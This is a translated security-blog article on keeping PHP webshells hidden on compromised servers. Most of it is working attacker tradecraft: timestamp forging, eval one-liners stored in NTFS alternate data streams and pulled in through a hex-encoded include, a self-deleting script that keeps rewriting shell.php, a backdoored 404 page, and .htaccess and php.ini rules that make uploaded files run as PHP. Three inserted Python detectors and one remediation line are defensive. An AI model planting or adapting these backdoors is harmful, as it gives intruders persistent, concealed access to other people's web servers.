PHP backdoor hiding skills
2020-11-06 22:33:35 【Official account Bypass】
For a webshell to stay in place longer, evading antivirus detection is not enough; there are also hiding techniques to be aware of, such as hiding the file, modifying its time attributes and hiding the file contents.
1. Hiding files
The attrib +s +a +h +r command adds the system, archive, hidden and read-only attributes to a file or folder. Files marked this way are omitted from a plain dir listing but still appear with dir /a.
attrib +s +a +h +r shell.php // hide shell.php file
2. Modifying file time attributes
When a newly created file is hidden among a set of existing files, a plausible file name is not enough; the file's timestamps also have to be changed.
# Set the modification (last write) time
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
# Set the last access time
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
# Set the creation time
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"
Use the following command to view a file's properties:
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force
Modify the creation and modification times of all files in a folder:
powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"
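From the defender's side, a timestamp set from a string such as "2020-11-01 12:12:12" has no fractional seconds, whereas files written normally on NTFS almost always do. The following added example (not from the original article) flags files whose modification time falls on a whole second; the function names and the constructed sample directory are assumptions, and a hit is a lead to check against upload and deployment logs, since archive extraction can also produce whole-second times.

```python
import os
import tempfile
from pathlib import Path

NS_PER_SECOND = 1_000_000_000
STOMPED_EPOCH = 1604232732  # 2020-11-01 12:12:12 UTC, the value used in the commands above

def whole_second_mtimes(directory):
    """Return names of files whose mtime has a zero sub-second part."""
    hits = []
    for entry in sorted(Path(directory).iterdir()):
        if entry.is_file() and entry.stat().st_mtime_ns % NS_PER_SECOND == 0:
            hits.append(entry.name)
    return hits

def build_sample_dir():
    """Constructed sample: one normally written file, one back-dated to a whole second."""
    root = Path(tempfile.mkdtemp())
    normal = root / "index.php"
    normal.write_text("<?php echo 'ok';")
    natural = STOMPED_EPOCH * NS_PER_SECOND + 500_000_000  # keeps a fractional part
    os.utime(normal, ns=(natural, natural))
    stomped = root / "2.txt"
    stomped.write_text("x")
    os.utime(stomped, ns=(STOMPED_EPOCH * NS_PER_SECOND, STOMPED_EPOCH * NS_PER_SECOND))
    return root

if __name__ == "__main__":
    print(whole_second_mtimes(build_sample_dir()))
```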
3. Hiding file content with ADS
On the server, echo can write content into an NTFS alternate data stream (ADS) attached to an existing file. For example, if index.php is a normal web page file, it can be done like this:
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
This creates an invisible shell in the stream hidden.jpg. A regular file manager and the type, dir and del commands do not find hidden.jpg (dir /r and Get-Item -Stream * do list alternate streams).
The include function is then used: the path index.php:hidden.jpg is hex-encoded and the ADS is included from a PHP file, so that the one-liner is parsed and executed normally.
<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>
4. The undead horse
The undead horse deletes its own file and keeps running as a process, creating the hidden backdoor again in a loop.
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__); // Delete this script's own file
while(1)
{
file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); // Create shell.php; the author recommends an AV-evading one-liner here
sleep(10); // Interval between rewrites
}
?>
The simplest and most effective way to deal with it is to restart the service and delete the webshell file.
5. Middleware backdoor
The compiled .so file is copied into the modules folder, the backdoor module is enabled and Apache is restarted. Sending a particular string in a specific parameter then triggers the backdoor.
GitHub project address:
https://github.com/VladRico/apache2_BackdoorMod
6. Hiding a backdoor in a 404 page
A 404 page exists mainly to improve the user experience, and it can also be used to hide a backdoor.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>
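The source-level patterns from sections 3 and 6 can be searched for directly. The following added example (not from the original article) scans PHP source for an include whose path is hidden in pack('H*', ...), decodes the hex to reveal the real target, and flags preg_replace with the /e modifier and eval on request data; the function name and finding labels are assumptions, and the samples are constructed from the snippets on this page.

```python
import re

# include/require whose argument is pack('H*', '<hex>'): the real path is hidden in hex
PACKED_INCLUDE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*pack\s*\(\s*['\"]H\*['\"]\s*,\s*['\"]([0-9a-f]+)['\"]",
    re.IGNORECASE)
# preg_replace with a /.../ pattern literal; group 2 holds the modifiers (other delimiters not covered)
PREG_REPLACE = re.compile(r"preg_replace\s*\(\s*(['\"])/.*?/([a-z]*)\1", re.IGNORECASE | re.DOTALL)
# eval()/assert() fed directly from request data
EVAL_INPUT = re.compile(r"\b(?:eval|assert)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.IGNORECASE)

def scan_php(source):
    """Return (indicator, detail) tuples for the backdoor patterns above."""
    findings = []
    for m in PACKED_INCLUDE.finditer(source):
        hexstr = m.group(1)
        if len(hexstr) % 2:          # tolerate an odd-length literal
            hexstr += "0"
        target = bytes.fromhex(hexstr).decode("latin-1")
        # A colon past a possible drive letter means "file:stream", i.e. an ADS
        kind = "include-hex-ads" if ":" in target[2:] else "include-hex-path"
        findings.append((kind, target))
    for m in PREG_REPLACE.finditer(source):
        if "e" in m.group(2).lower():  # /e runs the replacement as PHP (removed in PHP 7.0)
            findings.append(("preg-replace-e", m.group(0)))
    for m in EVAL_INPUT.finditer(source):
        findings.append(("eval-request-input", m.group(0)))
    return findings

# Constructed samples taken from the snippets in sections 3 and 6, plus one benign file.
SAMPLE_ADS_INCLUDE = r"""<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>"""
SAMPLE_404 = r'''<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>'''
SAMPLE_CLEAN = r"""<?php echo preg_replace('/e+/i', 'x', $title); ?>"""

if __name__ == "__main__":
    for sample in (SAMPLE_ADS_INCLUDE, SAMPLE_404, SAMPLE_CLEAN):
        print(scan_php(sample))
```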
7. Building a PHP backdoor with .htaccess
An .htaccess file is commonly used to leave backdoors and bypass extension blacklists. An .htaccess file created in the upload directory takes effect without a restart; with the following line, uploaded .png files are parsed as PHP.
AddType application/x-httpd-php .png
In addition, a PHP parsing rule can be added to .htaccess so that any file whose name contains 1 is parsed as PHP; an uploaded 1.txt is then parsed.
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
8. Hiding a backdoor with php.ini
php.ini can name files that are automatically parsed before and after the main script runs. This is commonly used for a shared page header and footer, and it can also be used to hide a PHP backdoor.
; Automatically add a file before the PHP document.
auto_prepend_file = "c:\tmp.txt"
; Automatically add a file after the PHP document.
auto_append_file = "c:\tmp.txt"
The service has to be restarted for this to take effect; after that, requesting any PHP file reaches the webshell.
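The directives in sections 7 and 8 are plain text and can be audited. The following added example (not from the original article) reports .htaccess lines that hand non-PHP extensions or file-name matches to the PHP handler, and php.ini lines that set a non-empty auto-include file; the function names, the list of expected PHP extensions and the samples are assumptions, and findings are meant for comparison against a known-good configuration.

```python
import re

PHP_HANDLER = "application/x-httpd-php"
PHP_EXTS = {".php", ".phtml", ".phar"}  # assumption: extensions meant to run as PHP
AUTO_KEYS = ("auto_prepend_file", "auto_append_file")

def audit_htaccess(text):
    """Return (line_no, issue, detail) for directives that widen PHP execution."""
    findings, scope = [], None
    for n, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        opened = re.match(r'\s*<FilesMatch\s+"?([^">]+)"?\s*>', raw, re.I)
        if opened:
            scope = opened.group(1)
        elif parts[0].lower().startswith("</filesmatch"):
            scope = None
        elif parts[0].lower() in ("addtype", "addhandler") and PHP_HANDLER in raw.lower():
            odd = [e for e in parts[2:] if e.lower() not in PHP_EXTS]
            if odd:
                findings.append((n, "php-handler-for-extension", " ".join(odd)))
        elif parts[0].lower() == "sethandler" and PHP_HANDLER in raw.lower():
            findings.append((n, "php-handler-in-scope", scope or "<whole directory>"))
        elif parts[0].lower() == "php_value" and len(parts) > 2 and parts[1].lower() in AUTO_KEYS:
            findings.append((n, parts[1].lower(), parts[2].strip("\"'")))
    return findings

def audit_php_ini(text):
    """Return (line_no, key, value) for non-empty auto-include directives."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        key, sep, value = raw.split(";", 1)[0].partition("=")
        key, value = key.strip().lower(), value.strip().strip("\"'")
        if sep and key in AUTO_KEYS and value and value.lower() != "none":
            findings.append((n, key, value))
    return findings

# Constructed samples reproducing the directives shown in sections 7 and 8.
HTACCESS_SAMPLE = """AddType application/x-httpd-php .png
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
"""
PHP_INI_SAMPLE = r"""; constructed php.ini fragment
auto_prepend_file = "c:\tmp.txt"
auto_append_file =
"""
print(audit_htaccess(HTACCESS_SAMPLE), audit_php_ini(PHP_INI_SAMPLE))
```

Some applications set auto_prepend_file legitimately, so each hit should be checked against the deployed baseline before it is treated as malicious.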
This article is from the WeChat official account Bypass (Bypass--).